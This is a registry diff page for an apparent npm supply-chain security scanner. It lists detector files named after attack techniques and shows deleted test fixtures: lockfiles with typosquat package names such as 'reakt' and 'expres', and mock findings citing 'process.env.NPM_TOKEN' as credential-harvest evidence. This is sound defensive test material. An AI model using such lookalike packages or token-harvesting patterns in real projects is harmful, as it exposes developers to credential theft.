npm - @lateos/npm-scan - Versions diffs - 0.18.3 → 1.1.0 - Mend

@lateos/npm-scan 0.18.3 → 1.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (149) hide show

package/CHANGELOG.md +32 -0
package/README.md +864 -826
package/VALIDATION.md +92 -0
package/backend/cra.js +113 -21
package/backend/db/pg-schema.sql +155 -0
package/backend/db.js +18 -10
package/backend/detectors/atk-001-lifecycle.js +5 -5
package/backend/detectors/atk-002-obfusc.js +126 -47
package/backend/detectors/atk-003-creds.js +8 -4
package/backend/detectors/atk-004-persist.js +3 -3
package/backend/detectors/atk-005-exfil.js +8 -4
package/backend/detectors/atk-006-depconf.js +3 -3
package/backend/detectors/atk-007-typosquat.js +64 -10
package/backend/detectors/atk-008-tarball-tamper.js +6 -6
package/backend/detectors/atk-009-dormant-trigger.js +9 -5
package/backend/detectors/atk-010-sandbox-evasion.js +25 -10
package/backend/detectors/atk-011-transitive-prop.js +14 -13
package/backend/detectors/axios-poisoning/d1-version-fingerprint.js +4 -4
package/backend/detectors/axios-poisoning/d2-decoy-dep.js +5 -1
package/backend/detectors/axios-poisoning/d3-postinstall-rat.js +64 -19
package/backend/detectors/axios-poisoning/index.js +77 -60
package/backend/detectors/config/thresholds.js +111 -0
package/backend/detectors/config/whitelist.json +74 -0
package/backend/detectors/cve-2026-48710-badhost/codePattern.js +26 -9
package/backend/detectors/cve-2026-48710-badhost/findings.js +8 -4
package/backend/detectors/cve-2026-48710-badhost/index.js +1 -1
package/backend/detectors/cve-2026-48710-badhost/manifest.js +127 -39
package/backend/detectors/cve-2026-48710-badhost/transitive.js +87 -28
package/backend/detectors/hf-impersonation/index.js +94 -31
package/backend/detectors/hf-impersonation/jaro-winkler.js +33 -12
package/backend/detectors/hf-impersonation/known-orgs.js +15 -3
package/backend/detectors/hf-impersonation/simhash.js +2 -2
package/backend/detectors/index.js +184 -31
package/backend/detectors/lib/ast-patterns.js +24 -0
package/backend/detectors/lib/entropy-analyzer.js +32 -0
package/backend/detectors/megalodon/d1-workflow-scan.js +40 -16
package/backend/detectors/megalodon/d2-credential-harvest.js +12 -5
package/backend/detectors/megalodon/d3-publish-velocity.js +17 -11
package/backend/detectors/megalodon/d4-publisher-drift.js +48 -16
package/backend/detectors/megalodon/d5-bot-commit-identity.js +1 -1
package/backend/detectors/megalodon/d6-date-anachronism.js +1 -1
package/backend/detectors/megalodon/index.js +35 -25
package/backend/detectors/mini-shai-hulud/d1-burst-publish.js +3 -1
package/backend/detectors/mini-shai-hulud/d2-sibling-compromise.js +22 -10
package/backend/detectors/mini-shai-hulud/d3-slsa-mismatch.js +30 -10
package/backend/detectors/mini-shai-hulud/d4-maintainer-anomaly.js +17 -13
package/backend/detectors/mini-shai-hulud/d5-ioc-check.js +12 -4
package/backend/detectors/mini-shai-hulud/d6-token-exfil.js +6 -2
package/backend/detectors/mini-shai-hulud/index.js +63 -26
package/backend/detectors/msh-supplement/d2-persistence.js +30 -12
package/backend/detectors/msh-supplement/d3-geo-killswitch.js +20 -8
package/backend/detectors/msh-supplement/d4-c2-deaddrop.js +19 -5
package/backend/detectors/msh-supplement/index.js +78 -63
package/backend/detectors/node-ipc-compromise/d1-version-blocklist.js +4 -2
package/backend/detectors/node-ipc-compromise/d10-unauthorized-publisher.js +9 -5
package/backend/detectors/node-ipc-compromise/d11-blast-radius.js +7 -3
package/backend/detectors/node-ipc-compromise/d2-tarball-hash.js +9 -4
package/backend/detectors/node-ipc-compromise/d3-cjs-payload-injection.js +7 -5
package/backend/detectors/node-ipc-compromise/d4-injected-payload-hash.js +4 -2
package/backend/detectors/node-ipc-compromise/d5-dns-c2-pattern.js +13 -10
package/backend/detectors/node-ipc-compromise/d7-dns-txt-exfil.js +3 -1
package/backend/detectors/node-ipc-compromise/d8-runtime-trigger.js +5 -2
package/backend/detectors/node-ipc-compromise/index.js +21 -15
package/backend/detectors/tier1-binary-embed.js +138 -41
package/backend/detectors/tier1-cloud-imds.js +57 -37
package/backend/detectors/tier1-encrypted-c2.js +198 -0
package/backend/detectors/tier1-infostealer.js +121 -68
package/backend/detectors/tier1-lifecycle-hook.js +63 -23
package/backend/detectors/tier1-maintainer-compromise.js +157 -0
package/backend/detectors/tier1-metadata-spoof.js +92 -42
package/backend/detectors/tier1-multistage-postinstall.js +46 -19
package/backend/detectors/tier1-obfuscation-heuristics.js +184 -0
package/backend/detectors/tier1-self-propagation.js +115 -0
package/backend/detectors/tier1-slsa-attestation.js +12 -0
package/backend/detectors/tier1-transitive-deps.js +182 -0
package/backend/detectors/tier1-typosquat.js +129 -50
package/backend/detectors/tier1-version-anomaly.js +223 -0
package/backend/detectors/tier1-version-confusion.js +79 -59
package/backend/detectors/trapdoor/d1-campaign-marker.js +3 -1
package/backend/detectors/trapdoor/d2-payload-fingerprint.js +1 -1
package/backend/detectors/trapdoor/d3-publisher-blocklist.js +4 -3
package/backend/detectors/trapdoor/d4-gists-exfil.js +4 -2
package/backend/detectors/trapdoor/d5-ai-poisoning.js +5 -3
package/backend/detectors/trapdoor/d6-lure-name.js +12 -7
package/backend/detectors/trapdoor/d7-crypto-primitives.js +2 -2
package/backend/detectors/trapdoor/d8-xor-key.js +7 -2
package/backend/detectors/trapdoor/d9-cred-validation.js +4 -5
package/backend/detectors/trapdoor/index.js +19 -14
package/backend/detectors/typosquat-vpmdhaj/d1-maintainer.js +32 -8
package/backend/detectors/typosquat-vpmdhaj/d2-preinstall-loader.js +5 -3
package/backend/detectors/typosquat-vpmdhaj/d3-cred-exfil.js +34 -12
package/backend/detectors/typosquat-vpmdhaj/index.js +78 -59
package/backend/detectors.test.js +147 -0
package/backend/fetch.js +37 -29
package/backend/index.js +1 -1
package/backend/license.js +20 -4
package/backend/lockfile.js +60 -36
package/backend/pdf.js +107 -28
package/backend/policy.js +183 -56
package/backend/provenance.js +28 -3
package/backend/report.js +136 -70
package/backend/sbom.js +33 -27
package/backend/scripts/analyze-false-positives.js +152 -0
package/backend/scripts/analyze-validation.js +157 -0
package/backend/scripts/detect-false-positives.js +103 -0
package/backend/scripts/fetch-top-packages.js +277 -0
package/backend/scripts/validate-d10-d13.js +103 -0
package/backend/scripts/validate-detectors.js +151 -0
package/backend/siem/cef.js +23 -21
package/backend/siem/ecs.js +3 -3
package/backend/siem/index.js +1 -1
package/backend/siem/qradar.js +3 -3
package/backend/siem/sentinel.js +2 -2
package/backend/tests-d5-enhanced.test.js +47 -0
package/backend/tests-d6-version-anomaly.test.js +67 -0
package/backend/tests-d6.test.js +126 -0
package/backend/tests-d6c.test.js +119 -0
package/backend/tests-d7-obfuscation.test.js +88 -0
package/backend/tests.test.js +997 -0
package/backend/vsix-scan/detectors/activation-event-risk.js +36 -19
package/backend/vsix-scan/detectors/burst-publish.js +14 -7
package/backend/vsix-scan/detectors/exfil-pattern.js +7 -3
package/backend/vsix-scan/detectors/known-ioc.js +23 -8
package/backend/vsix-scan/detectors/orphan-commit-fetch.js +11 -7
package/backend/vsix-scan/detectors/publisher-anomaly.js +24 -10
package/backend/vsix-scan/index.js +97 -41
package/backend/vsix-scan/marketplace-client.js +29 -13
package/cli/cli.js +154 -64
package/package.json +36 -10
package/.dockerignore +0 -20
package/.husky/pre-commit +0 -1
package/SECURITY.md +0 -73
package/deploy/helm/npm-scan/Chart.yaml +0 -22
package/deploy/helm/npm-scan/templates/_helpers.tpl +0 -9
package/deploy/helm/npm-scan/templates/api.yaml +0 -94
package/deploy/helm/npm-scan/templates/ingress.yaml +0 -28
package/deploy/helm/npm-scan/templates/postgresql.yaml +0 -67
package/deploy/helm/npm-scan/templates/secrets.yaml +0 -19
package/deploy/helm/npm-scan/templates/worker.yaml +0 -32
package/deploy/helm/npm-scan/values.byoc.yaml +0 -75
package/deploy/helm/npm-scan/values.yaml +0 -103
package/scripts/download-corpus.js +0 -30
package/scripts/gen-mal-corpus.js +0 -35
package/scripts/generate-campaign-fixtures.js +0 -170
package/src/config/top-5000.json +0 -87
package/test/fixtures/lockfiles/npm-lock.json +0 -69
package/test/fixtures/lockfiles/pnpm-lock.yaml +0 -118
package/test/fixtures/lockfiles/yarn.lock +0 -104
package/test/fixtures/mock-data.js +0 -69

package/src/config/top-5000.json DELETED Viewed

@@ -1,87 +0,0 @@
-[
-  "lodash", "react", "express", "axios", "chalk", "vue", "typescript", "moment", "uuid", "commander",
-  "debug", "semver", "underscore", "request", "async", "cheerio", "bluebird", "jest", "mocha", "dotenv",
-  "glob", "minimist", "body-parser", "cors", "helmet", "jsonwebtoken", "socket.io", "redis", "mongoose", "sequelize",
-  "pg", "passport", "nodemailer", "multer", "bcrypt", "winston", "luxon", "dayjs", "rxjs", "redux",
-  "react-dom", "next", "nuxt", "angular", "fastify", "hono", "koa", "connect", "vite", "rollup",
-  "esbuild", "babel-core", "ramda", "node-fetch", "got", "superagent", "prisma", "typeorm", "vitest", "ava",
-  "prettier", "eslint", "stylelint", "ws", "rimraf", "minimatch", "fs-extra", "webpack", "parcel", "gatsby",
-  "tslib", "core-js", "regenerator-runtime", "buffer", "class-validator", "class-transformer", "reflect-metadata", "zone.js", "graphql", "apollo-server",
-  "express-graphql", "type-graphql", "nexus", "prisma-binding", "graphql-yoga", "apollo-client", "urql", "relay-runtime", "subscriptions-transport-ws", "graphql-subscriptions",
-  "graphql-tools", "graphql-tag", "graphql-upload", "dataloader", "envalid", "joi", "yup", "zod", "superstruct", "io-ts",
-  "runtypes", "ow", "ajv", "validator", "validatorjs", "validate.js", "indicative", "computed-types", "typebox", "typia",
-  "sinon", "chai", "should", "expect", "proxyquire", "nock", "nyc", "istanbul", "c8", "tap",
-  "ava", "uvu", "tape", "benchmark", "microbench", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "got",
-  "undici", "needle", "phin", "wreck", "bent", "make-fetch-happen", "http-proxy-agent", "https-proxy-agent", "socks-proxy-agent", "agent-base",
-  "express-session", "cookie-parser", "cookie-session", "csurf", "lusca", "helmet-csp", "hpp", "rate-limiter-flexible", "express-rate-limit", "express-brute",
-  "passport-local", "passport-jwt", "passport-oauth2", "passport-http", "passport-google-oauth", "passport-facebook", "passport-github", "passport-twitter", "passport-linkedin", "passport-apple",
-  "bcryptjs", "argon2", "scrypt", "password-hash", "hasha", "pbkdf2", "node-forge", "crypto-js", "crypto-random-string", "nanoid",
-  "jsonwebtoken", "json5", "fast-json-stable-stringify", "flatted", "serialize-javascript", "javascript-natural-sort", "json-stringify-safe", "json-stable-stringify", "json3", "json-parse-even-better-errors",
-  "morgan", "pino", "winston-cloudwatch", "log4js", "bunyan", "signale", "consola", "loglevel", "loglevelnext", "roarr",
-  "ora", "listr", "progress", "cli-progress", "cli-spinners", "log-symbols", "log-update", "figures", "ansi-styles", "supports-color",
-  "nodemon", "concurrently", "npm-run-all", "parallelshell", "shelljs", "execa", "cross-env", "env-cmd", "dotenv-safe", "dotenv-expand",
-  "pm2", "forever", "supervisor", "node-dev", "tsx", "ts-node", "ts-node-dev", "ts-jest", "ts-loader", "typescript-json-schema",
-  "eslint-config-airbnb", "eslint-config-prettier", "eslint-plugin-react", "eslint-plugin-vue", "eslint-plugin-import", "eslint-plugin-node", "eslint-plugin-promise", "eslint-plugin-standard", "eslint-plugin-jsx-a11y", "eslint-plugin-jest",
-  "prettier-eslint", "pretty-quick", "lint-staged", "husky", "lint-staged", "commitlint", "cz-conventional-changelog", "standard-version", "semantic-release", "release-it",
-  "webpack-cli", "webpack-dev-server", "webpack-merge", "webpack-node-externals", "css-loader", "style-loader", "sass-loader", "less-loader", "postcss-loader", "file-loader",
-  "url-loader", "html-webpack-plugin", "mini-css-extract-plugin", "terser-webpack-plugin", "optimize-css-assets-webpack-plugin", "clean-webpack-plugin", "copy-webpack-plugin", "define-plugin", "provide-plugin", "ignore-plugin",
-  "electron", "electron-builder", "electron-packager", "electron-forge", "nativefier", "nw", "nw-builder", "tauri", "tauri-cli", "wry",
-  "puppeteer", "playwright", "playwright-core", "cypress", "selenium-webdriver", "webdriverio", "nightwatch", "testcafe", "protractor", "karma",
-  "sharp", "node-canvas", "canvas", "jimp", "gm", "lwip", "pngjs", "jpeg-js", "gif-js", "qrcode",
-  "ffmpeg-static", "fluent-ffmpeg", "ffprobe-static", "musicmetadata", "node-id3", "sox-audio", "wav", "speaker", "node-lame", "audiobuffer-to-wav",
-  "chromium", "chrome-launcher", "chrome-aws-lambda", "puppeteer-extra", "puppeteer-extra-plugin-stealth", "playwright-extra", "puppeteer-cluster", "puppeteer-core", "playwright-firefox", "playwright-webkit",
-  "react-scripts", "create-react-app", "react-dev-utils", "react-error-overlay", "react-refresh", "react-hot-loader", "react-fast-refresh", "react-app-polyfill", "react-app-rewired", "customize-cra",
-  "next", "gatsby", "gatsby-cli", "gatsby-plugin-*", "gridsome", "remix", "remix-run", "blitz", "blitzjs", "redwoodjs",
-  "@angular/cli", "@angular/core", "@angular/common", "@angular/compiler", "@angular/platform-browser", "@angular/platform-browser-dynamic", "@angular/forms", "@angular/router", "@angular/http", "@angular/animations",
-  "@angular-devkit/core", "@angular-devkit/schematics", "@angular-devkit/build-angular", "@angular-devkit/build-optimizer", "@ngrx/store", "@ngrx/effects", "@ngrx/entity", "@ngrx/store-devtools", "@angular/material", "@angular/cdk",
-  "vue-router", "vuex", "vuepress", "vue-cli", "vue-loader", "vue-template-compiler", "vue-server-renderer", "vite", "vitest", "pinia",
-  "nuxt", "svelte", "sveltekit", "sapper", "solid-js", "solid-start", "preact", "inferno", "lit", "lit-html",
-  "htm", "hono", "alpinejs", "stimulus", "turbolinks", "hotwired-turbo", "hotwired-stimulus", "unpoly", "petite-vue", "qwik",
-  "express", "fastify", "hapi", "restify", "micro", "polka", "tinyhttp", "sails", "adonis-framework", "loopback",
-  "feathers", "nest", "routing-controllers", "typedi", "inversify", "awilix", "awilix-express", "express-di", "injection-js", "tsyringe",
-  "typeorm", "prisma", "drizzle-orm", "knex", "kysely", "better-sqlite3", "sql.js", "sequelize", "bookshelf", "objection",
-  "mongoose", "mongodb", "mongodb-memory-server", "mongoose-sequence", "mongoskin", "monk", "realm", "tingodb", "lokijs", "nedb",
-  "redis", "ioredis", "redis-commander", "connect-redis", "session-file-store", "connect-mongo", "connect-memcached", "couchbase", "memcached", "leveldown",
-  "mysql", "mysql2", "mariasql", "pg-promise", "pg-native", "pg-pool", "sqlite3", "sql.js", "better-sqlite3", "sqlcipher",
-  "socket.io", "ws", "uws", "faye-websocket", "sockjs", "socket.io-client", "socket.io-redis", "socket.io-emitter", "socket.io-adapter", "primus",
-  "amqplib", "kafkajs", "node-rdkafka", "rhea", "nats", "nats-hemera", "mqtt", "mqemitter", "mosca", "aedes",
-  "bull", "bullmq", "bee-queue", "kue", "agenda", "node-cron", "cron", "node-schedule", "later", "bree",
-  "handlebars", "mustache", "ejs", "pug", "nunjucks", "liquidjs", "eta", "twig", "marko", "dustjs-linkedin",
-  "jsdom", "cheerio", "htmlparser2", "node-html-parser", "parse5", "linkedom", "xmldom", "sax", "node-expat", "libxmljs",
-  "marked", "remarkable", "showdown", "markdown-it", "commonmark", "remark", "remark-parse", "remark-stringify", "unified", "rehype",
-  "dayjs", "date-fns", "luxon", "moment-timezone", "timeago.js", "ms", "pretty-ms", "pretty-hrtime", "strftime", "dateformat",
-  "dotenv", "config", "nconf", "convict", "env-var", "envschema", "envalid", "properties-reader", "ini", "toml",
-  "colors", "chalk", "kleur", "colorette", "picocolors", "nanocolors", "ansi-colors", "color-string", "color-convert", "color-name",
-  "fs-extra", "graceful-fs", "make-dir", "klaw", "klaw-sync", "readdirp", "watchpack", "chokidar", "fsevents", "micromatch",
-  "globby", "fast-glob", "picomatch", "minimatch", "brace-expansion", "ignore", "anymatch", "is-glob", "is-extglob", "normalize-path",
-  "archiver", "unzipper", "decompress", "tar", "tar-fs", "tar-stream", "yauzl", "yazl", "adm-zip", "extract-zip",
-  "cross-spawn", "spawn-command", "tree-kill", "signal-exit", "ps-tree", "pidtree", "pidusage", "process-exists", "find-process", "fkill",
-  "which", "find-up", "locate-path", "pkg-dir", "resolve-from", "import-fresh", "resolve", "resolve-cwd", "pkg-up", "global-prefix",
-  "cosmiconfig", "lilconfig", "load-json-file", "parse-json", "json-parse-even-better-errors", "json5", "strip-json-comments", "comment-json", "jsonc-parser", "hjson",
-  "zod", "joi", "yup", "superstruct", "io-ts", "runtypes", "ow", "typebox", "typia", "valibot",
-  "inquirer", "enquirer", "prompts", "readline-sync", "read", "co-prompt", "cli-interact", "listr2", "node-prompt", "password-prompt",
-  "yargs", "yargs-parser", "meow", "arg", "getopts", "mri", "sade", "cac", "clipanion", "command-line-args",
-  "ora", "nanospinner", "cli-spinners", "listr", "progress", "cli-progress", "log-update", "log-symbols", "spinnies", "elegant-spinner",
-  "boxen", "window-size", "cli-table", "cli-table3", "easy-table", "columnify", "wordwrap", "wrap-ansi", "string-width", "strip-ansi",
-  "http-errors", "http-status-codes", "statuses", "boom", "http-assert", "http-response-object", "http-errors", "http-status", "status-code", "http-code",
-  "express", "koa", "koa-router", "koa-body", "koa-static", "koa-send", "koa-compress", "koa-logger", "koa-cors", "koa-session",
-  "axios", "superagent", "got", "node-fetch", "cross-fetch", "isomorphic-fetch", "ky", "ky-universal", "make-fetch-happen", "undici",
-  "lodash", "ramda", "lodash-es", "lodash.merge", "lodash.get", "lodash.set", "lodash.clonedeep", "lodash.isequal", "lodash.pick", "lodash.omit",
-  "defu", "merge-options", "deepmerge", "assign-deep", "deep-assign", "defaults-deep", "clone-deep", "merge-deep2", "merge-descriptors", "utils-merge",
-  "uuid", "nanoid", "cuid", "ulid", "bson", "objectid", "shortid", "hyperid", "flake-idgen", "snowflake-id",
-  "express", "passport", "bcrypt", "jsonwebtoken", "helmet", "cors", "express-rate-limit", "express-session", "cookie-parser", "csurf",
-  "next-auth", "passport", "passport-jwt", "passport-local", "keycloak-connect", "oauth2orize", "grant", "openid-client", "node-oidc-provider", "iron-session",
-  "lodash", "rxjs", "immer", "immutable", "seamless-immutable", "dot-prop", "object-path", "selectn", "rfdc", "clone",
-  "react-router", "react-router-dom", "reach-router", "wouter", "raviger", "navigation-react", "router5", "universal-router", "redux-router", "connected-react-router",
-  "redux", "redux-toolkit", "mobx", "mobx-react-lite", "recoil", "jotai", "zustand", "valtio", "xstate", "effector",
-  "react-query", "tanstack-query", "swr", "apollo-client", "urql", "relay-runtime", "react-apollo", "graphql-request", "rtk-query", "redux-observable",
-  "react-hook-form", "formik", "react-final-form", "redux-form", "uniforms", "react-jsonschema-form", "informed", "react-form", "formily", "vest",
-  "d3", "chart.js", "echarts", "highcharts", "plotly.js", "recharts", "victory", "nivo", "visx", "billboard.js",
-  "three", "babylonjs", "phaser", "pixi.js", "playcanvas", "aframe", "cannon-es", "ammo.js", "oimo", "matter-js",
-  "leaflet", "openlayers", "mapbox-gl", "cesium", "deck.gl", "luma.gl", "turf", "geolib", "geojson", "proj4",
-  "i18next", "react-i18next", "polyglot", "i18n", "i18n-js", "formatjs", "lingui", "react-intl", "react-intl-universal", "fbt",
-  "pdfkit", "pdf-lib", "pdfmake", "pdfjs", "jspdf", "pdf2json", "pdf-parse", "pdf2pic", "html-pdf", "puppeteer",
-  "exceljs", "xlsx", "csv-parse", "csv-stringify", "csvtojson", "csv-parser", "papaparse", "json2csv", "csv2json", "csv-writer",
-  "mongoist", "mongojs", "mongodb-memory-server", "mongodb-memory-server-core", "mongotop", "mongostat", "mongorestore", "mongodump", "mongo-hacker", "mongoplayground",
-  "json2typescript", "ts-json-serializer", "class-transformer", "autobind-decorator", "reflect-metadata", "typed-mock", "ts-mockito", "jest-mock-extended", "type-mock", "typemoq"
-]

package/test/fixtures/lockfiles/npm-lock.json DELETED Viewed

@@ -1,69 +0,0 @@
-{
-  "name": "test-project",
-  "version": "1.0.0",
-  "lockfileVersion": 3,
-  "packages": {
-    "": {
-      "name": "test-project",
-      "version": "1.0.0",
-      "dependencies": {
-        "lodash": "^4.17.21",
-        "axios": "^1.6.0"
-      },
-      "devDependencies": {
-        "@babel/core": "^7.23.0"
-      }
-    },
-    "node_modules/lodash": {
-      "name": "lodash",
-      "version": "4.17.21",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
-      "integrity": "sha512-v2kDEeDAnj4p1hhL6Ogrgu4BSWwg8cD2fRIouDAiqwu+iNl1IvyMex9jG9j8OpNp1zntnv/headququbit",
-      "dependencies": {}
-    },
-    "node_modules/axios": {
-      "name": "axios",
-      "version": "1.6.8",
-      "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz",
-      "integrity": "sha512-j2xvyqwsdd456789abcdef",
-      "dependencies": {
-        "form-data": "4.0.0",
-        "proxy-from-env": "1.1.0"
-      }
-    },
-    "node_modules/axios/node_modules/form-data": {
-      "version": "4.0.0",
-      "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz",
-      "integrity": "sha512-444567890123456"
-    },
-    "node_modules/@babel/core": {
-      "name": "@babel/core",
-      "version": "7.23.9",
-      "resolved": "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz",
-      "integrity": "sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==",
-      "dev": true,
-      "dependencies": {
-        "@babel/generator": "^7.23.6",
-        "@babel/parser": "^7.23.9"
-      }
-    },
-    "node_modules/reakt": {
-      "name": "reakt",
-      "version": "18.2.0",
-      "resolved": "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz",
-      "integrity": "sha-abcdabcd1234defghi",
-      "optional": true,
-      "dependencies": {}
-    },
-    "node_modules/express": {
-      "name": "express",
-      "version": "4.18.2",
-      "resolved": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
-      "integrity": "sha512-abcdabcd1234abcdefghi",
-      "dependencies": {
-        "accepts": "~1.3.8",
-        "body-parser": "1.20.2"
-      }
-    }
-  }
-}

package/test/fixtures/lockfiles/pnpm-lock.yaml DELETED Viewed

@@ -1,118 +0,0 @@
-lockfileVersion: "6.0"
-importers:
-  .:
-    dependencies:
-      lodash: "^4.17.21"
-      axios: "^1.6.0"
-    devDependencies:
-      "@babel/core": "^7.23.0"
-    optionalDependencies:
-      chalk: "^5.3.0"
-    peerDependencies:
-      react: ">=16"
-packages:
-  "/lodash@4.17.21":
-    resolution:
-      url: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"
-      sha512: X2xvyqwsdd456789abcdefghijk
-    dev: false
-    optional: false
-    dependencies: {}
-  "/axios@1.6.8":
-    resolution:
-      url: "https://registry.npmjs.org/axios/-/axios-1.6.8.tgz"
-      sha512: j2xvyqwsdd456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      form-data: "4.0.0"
-      proxy-from-env: "1.1.0"
-  "/reakt@18.2.0":
-    resolution:
-      url: "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-      sha512: abcdefghijk123456789
-    dev: false
-    optional: true
-    dependencies: []
-  "/@babel/core@7.23.9":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-      sha512: k2yVyqwsdd456789abcdefghij
-    dev: true
-    optional: false
-    dependencies:
-      "@babel/generator": "7.23.6"
-      "@babel/parser": "7.23.9"
-      "@babel/traverse": "7.23.9"
-      "@babel/types": "7.23.9"
-      convert-source-map: "2.0.0"
-      debug: "4.1.0"
-      gensync: "1.0.0-beta.2"
-      json5: "2.2.3"
-      semver: "6.3.1"
-  "/@babel/generator@7.23.6":
-    resolution:
-      url: "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-      sha512: abcdefghijk12345678abcdef
-    dev: false
-    optional: false
-    dependencies:
-      "@babel/types": "7.23.6"
-      "@jridgewell/gen-mapping": "0.3.2"
-      "@jridgewell/trace-mapping": "0.3.17"
-      jsesc: "2.5.1"
-  "/expres@4.18.2":
-    resolution:
-      url: "https://registry.npmjs.org/expres-4.18.2.tgz"
-      sha512: abcdefghijk12345678
-    dev: false
-    optional: false
-    dependencies:
-      accepts: "1.3.8"
-      array-flatten: "1.1.1"
-      body-parser: "1.20.2"
-      content-disposition: "0.5.4"
-      content-type: "1.0.5"
-      cookie: "0.5.0"
-      cookie-signature: "1.0.6"
-      debug: "2.6.9"
-      depd: "2.0.0"
-      encodeurl: "1.0.2"
-      escape-html: "1.0.3"
-      etag: "1.8.1"
-      finalhandler: "1.2.0"
-      fresh: "0.5.2"
-      http-errors: "2.0.0"
-      merge-descriptors: "1.0.1"
-      methods: "1.1.2"
-      on-finished: "2.4.1"
-      parseurl: "1.3.3"
-      path-to-regexp: "0.1.7"
-      proxy-addr: "2.0.7"
-      qs: "6.11.0"
-      range-parser: "1.2.1"
-      safe-buffer: "5.2.1"
-      send: "0.18.0"
-      serve-static: "1.15.0"
-      setprototypeof: "1.2.0"
-      statuses: "2.0.1"
-      type-is: "1.6.18"
-      utils-merge: "1.0.1"
-      vary: "1.1.2"
-  "/my-scope-plugin@1.0.0":
-    resolution:
-      url: "https://registry.npmjs.org/my-scope-plugin/-/my-scope-plugin-1.0.0.tgz"
-      sha512: defghijk123456789abcdef
-    dev: false
-    optional: false
-    dependencies:
-      lodash: "4.17.21"
-      axios: "1.6.8"

package/test/fixtures/lockfiles/yarn.lock DELETED Viewed

@@ -1,104 +0,0 @@
-lodash@^4.17.21:
-  version "4.17.21"
-  resolved "https://registry.yarnpkg.com/lodash/-/lodash-4.17.21.tgz"
-  integrity sha512-Vythumb
-  dependencies: {}
-  dev false
-  optional true
-axios@^1.6.0:
-  version "1.6.8"
-  resolved "https://registry.yarnpkg.com/axios/-/axios-1.6.8.tgz"
-  integrity sha-j2xvyqwsdd456789abcdef
-  dependencies:
-    form-data "4.0.0"
-    proxy-from-env "1.1.0"
-  dev false
-  optional false
-"@babel/core@^7.23.0", "@babel/core@^7.23.9":
-  version "7.23.9"
-  resolved "https://registry.yarnpkg.com/@babel/core/-/core-7.23.9.tgz"
-  integrity sha512-5q+M1iEJCOrGJs9NxzG3p3z7w2cJK/QuoRoI2pOJhtcNQjl9y7w6w4At5ZQHZdwqd+5N5G1lULu7I6pXVBw==
-  dependencies:
-    "@babel/generator" "^7.23.6"
-    "@babel/parser" "^7.23.9"
-    "@babel/traverse" "^7.23.9"
-    "@babel/types" "^7.23.9"
-    convert-source-map "^2.0.0"
-    debug "^4.1.0"
-    gensync "^1.0.0-beta.2"
-    json5 "^2.2.3"
-    semver "^6.3.1"
-    rimraf "^3.0.2"
-  dev true
-  optional false
-"@babel/generator@^7.23.6", "@babel/generator@^7.23.9":
-  version "7.23.6"
-  resolved "https://registry.yarnpkg.com/@babel/generator/-/generator-7.23.6.tgz"
-  integrity sha512-56bfx9G1AJAFDl5QuK6t7MTCW3CBi7J8j+GxJJPvZ7L1f4P2FG8f9dBiH8Hg4U5Gcb6Bi4Y8DQ8x0j8b1QE8w==
-  dependencies:
-    "@babel/types" "^7.23.6"
-    "@jridgewell/gen-mapping" "^0.3.2"
-    "@jridgewell/trace-mapping" "^0.3.17"
-    jsesc "^2.5.1"
-  dev false
-  optional false
-reakt@^18.2.0:
-  version "18.2.0"
-  resolved "https://registry.yarnpkg.com/reakt/-/reakt-18.2.0.tgz"
-  integrity sha512-abcdabcd1234defghi
-  dependencies: []
-  dev false
-  optional true
-express@npm:expres@^4.18.2:
-  version "4.18.2"
-  resolved "https://registry.npmjs.org/expres-4.18.2.tgz"
-  integrity sha512-abcdabcd1234abcdefghi
-  dependencies:
-    accepts "~1.3.8"
-    array-flatten "1.1.1"
-    body-parser "1.20.2"
-    content-disposition "0.5.4"
-    content-type "~1.0.5"
-    cookie "0.5.0"
-    cookie-signature "1.0.6"
-    debug "2.6.9"
-    depd "2.0.0"
-    encodeurl "~1.0.2"
-    escape-html "~1.0.3"
-    etag "~1.8.1"
-    finalhandler "1.2.0"
-    fresh "0.5.2"
-    http-errors "2.0.0"
-    merge-descriptors "1.0.1"
-    methods "~1.1.2"
-    on-finished "2.4.1"
-    parseurl "~1.3.3"
-    path-to-regexp "0.1.7"
-    proxy-addr "~2.0.7"
-    qs "6.11.0"
-    range-parser "~1.2.1"
-    safe-buffer "5.2.1"
-    send "0.18.0"
-    serve-static "1.15.0"
-    setprototypeof "1.2.0"
-    statuses "2.0.1"
-    type-is "~1.6.18"
-    utils-merge "1.0.1"
-    vary "~1.1.2"
-  dev false
-  optional false
-"my-scope-plugin@npm:my-scope-plugin@^1.0.0":
-  version "1.0.0"
-  resolved "https://registry.npmjs.org/my-scope-plugin-1.0.0.tgz"
-  integrity sha512-abcdefghijk123456789abcdef
-  dependencies:
-    lodash "^4.17.21"
-    axios "^1.6.0"
-  dev false
-  optional false

package/test/fixtures/mock-data.js DELETED Viewed

@@ -1,69 +0,0 @@
-export const MOCK_SCANS = [
-  {
-    package_name: 'lodash',
-    version: '4.17.21',
-    findings: [
-      { id: 'ATK-003', atk_id: 'ATK-003', severity: 'high', title: 'Credential harvest', description: 'Scrapes env vars', evidence: 'process.env.NPM_TOKEN' },
-      { id: 'ATK-009', severity: 'medium', title: 'Time trigger', description: 'Conditional trigger (time-based)', evidence: 'time-based trigger detected' },
-    ],
-  },
-];
-export const SINGLE_SCAN = MOCK_SCANS[0];
-export const EMPTY_SCAN = { package_name: 'clean-pkg', version: '1.0.0', findings: [] };
-export const MULTI_SEV_SCAN = {
-  package_name: 'multi-sev', version: '1.0.0', findings: [
-    { id: 'ATK-001', severity: 'critical', title: 'Critical finding' },
-    { id: 'ATK-002', severity: 'high', title: 'High finding' },
